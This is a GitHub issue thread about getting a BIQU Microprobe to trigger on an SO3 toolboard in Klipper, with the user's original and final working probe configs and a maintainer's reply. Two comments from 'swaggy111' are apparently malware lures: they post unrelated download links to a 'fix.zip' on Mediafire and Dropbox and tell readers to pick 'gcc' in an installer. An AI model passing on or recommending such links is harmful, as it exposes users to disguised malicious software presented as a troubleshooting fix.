LorinczElectronics/Orbiter-Toolboards #6: SO3 tool board compatible with BIQU Microprobe?

davey242, 2024-08-25:
Is the SO3 tool board compatible with BTT BIQU Microprobe?

I have a 3D Touch (BL Touch knockoff) connect and working. I am trying to replace with the BIQU Microprobe (v2). I added the Klipper code for the BIQU but it is not triggering. It only shows open and cannot home the Z without it hitting the bed (I use my finger to text above the bed).
Probe up and down work to raise/lower

Have tried with pin: ^!SO3:PA15 and pin: !SO3:PA15 with no luck. QUERY_PROBE will always show open.

`[output_pin probe_enable]
pin: SO3:PB3  # Set to the control pin on your board
value: 0

[probe]
pin: ^!SO3:PA15 # NOTE FOR V2 users: Set this to ^!PC14 to set the low level trigger 
deactivate_on_each_sample: False
x_offset: 0
y_offset: -35
z_offset: 0  # Will be overridden when you do a PROBE_CALIBRATE
samples: 2
speed: 5
samples_tolerance: 0.05
samples_tolerance_retries: 3
sample_retract_dist: 4 
activate_gcode:
    PROBE_DOWN
    G4 P500
deactivate_gcode:
    PROBE_UP `

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

RobertLorincz, 2024-08-28:
Hi, yes, it shall work. We discussed it with the O2 toolboard having the same issue, I updated the documentation for the O2 toolboard, connection to the O3 toolboard is similar. check the latest documentation for the O2 Toolboard. The pinout of the connectors are different but the signal names are the same. I will update the SO3 toolboard documentation soon with the microprobe.

davey242, 2024-08-29:
the BQ probe has White as Probe and Yellow as Server.
PB3 is server and PA15 is probe
Switching the White and Yellow as in the SO2 doc does not make sense as it would be wired incorrectly but the probe does not work with white on PA15 and yellow on PB2 with PA15 as !PA15 or ^!PA15.

I swapped the yellow and white as in the SO2 Documentation and as expected, the probe would not go down/up with the macros. I then swapped the pins in the config (essentially putting it back the way it was but on swapped pins) and the probe would go down/up by macro. 

using just ! on PB3 did not work but it is working with ^!PB3

Final working config is below which is the same as original post except for the yellow and white wire swapped and the pins in the config swapped to match.

`[output_pin probe_enable]
pin: SO3:PA15  # Set to the control pin on your board
value: 0

[probe]
pin: ^!SO3:PB3 # NOTE FOR V2 users: Set this to ^!PC14 to set the low level trigger 
deactivate_on_each_sample: False
x_offset: 0
y_offset: -35
z_offset: 0  # Will be overridden when you do a PROBE_CALIBRATE
samples: 2
speed: 5
samples_tolerance: 0.05
samples_tolerance_retries: 3
sample_retract_dist: 4 
activate_gcode:
    PROBE_DOWN
    G4 P500
deactivate_gcode:
    PROBE_UP`